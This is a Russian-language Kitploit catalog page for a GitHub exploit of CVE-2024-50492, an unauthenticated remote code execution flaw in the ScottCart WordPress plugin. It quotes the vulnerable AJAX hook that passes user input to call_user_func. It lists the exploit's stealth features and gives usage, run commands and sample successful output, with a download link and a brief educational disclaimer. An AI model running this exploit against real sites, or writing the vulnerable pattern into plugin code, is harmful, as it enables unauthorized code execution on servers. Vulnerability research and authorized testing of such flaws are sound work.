Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-50492 — ScottCart <= 1.1 - Неавторизованное удаленное выполнение кода | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2024-50492
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2024-50492

CVE-2024-50492

ScottCart <= 1.1 - Неавторизованное удаленное выполнение кода

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 CVE-2024-50492 - ScottCart <= 1.1 RCE Exploit

🔥 Эксплойт для ScottCart <= 1.1 - Удалённое выполнение кода без аутентификации
🧑‍💻 Автор: Nxploit – Khaled Alenazi


📌 Описание

Плагин ScottCart для WordPress (версии ≤ 1.1) уязвим к удалённому выполнению кода (RCE).
Это позволяет неаутентифицированным атакующим выполнять произвольные функции PHP на сервере через уязвимый AJAX-эндпоинт.

  • Плагин: ScottCart ≤ 1.1
  • Уязвимость: Внедрение функций без аутентификации → RCE
  • CVE: CVE-2024-50492
  • Оценка CVSS: 9.8 - Критическая

🧠 Как это работает

Плагин регистрирует незащищённое AJAX-действие:

root@kitploit:~
add_action('wp_ajax_nopriv_scottcart_load_function', 'scottcart_load_function_callback');

Которое выполняет:

root@kitploit:~
call_user_func($_POST['function']);

Позволяя атакующим вызывать любую существующую функцию PHP, например:

  • phpinfo()
  • scottcart_get_the_user_ip()
  • system() ← если расширена в модифицированных средах

  • 🚀 Возможности эксплойта

    • ✅ Автоматически отправляет сформированную полезную нагрузку для запуска уязвимого эндпоинта
    • ✅ Позволяет переопределить функцию через аргумент
    • ✅ Полезная нагрузка по умолчанию: phpinfo() для PoC
    • ✅ Сохраняет вывод в файл с временной меткой (например, results_2025-03-26_14-33-01.txt)
    • ✅ Пользовательский User-Agent, обработка ошибок и игнорирование SSL для скрытности

    🖥️ Использование

    root@kitploit:~
    usage: CVE-2024-50492.py [-h] -u URL [-p PAYLOAD]
    
    ScottCart <= 1.1 - Unauthenticated Remote Code Execution
    By Nxploit Khaled Alenazi.
    
    options:
      -h, --help            Показать это справочное сообщение и выйти
      -u URL, --url URL     Базовый URL цели (например, http://192.168.100.74:888/wordpress)
      -p PAYLOAD, --payload PAYLOAD
                            Вызываемая функция (по умолчанию: phpinfo)
    

    💡 Примеры

    🔍 Поведение по умолчанию (PoC с phpinfo()):

    root@kitploit:~
    python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress
    

    🔎 Вызов внутренней функции плагина:

    root@kitploit:~
    python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress -p scottcart_get_the_user_ip
    

    🧾 Пример вывода

    root@kitploit:~
    [+] Target URL: http://192.168.100.74:888/wordpress
    [+] Payload Function: phpinfo
    [*] Launching exploit...
    [+] Sending payload: function=phpinfo
    [+] Exploit successful! Output:
    
    PHP Version => 8.1.12
    ...
    

    📁 И сохранено в: results_2025-03-26_14-33-01.txt


    🛡️ Отказ от ответственности

    Этот инструмент предназначен только для образовательного и авторизованного тестирования.
    Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.


    💬 Благодарности

    • 💻 Эксплойт: Nxploit – Khaled Alenazi
    • 🛡️ Идентификатор CVE: CVE-2024-50492
    Скачать инструмент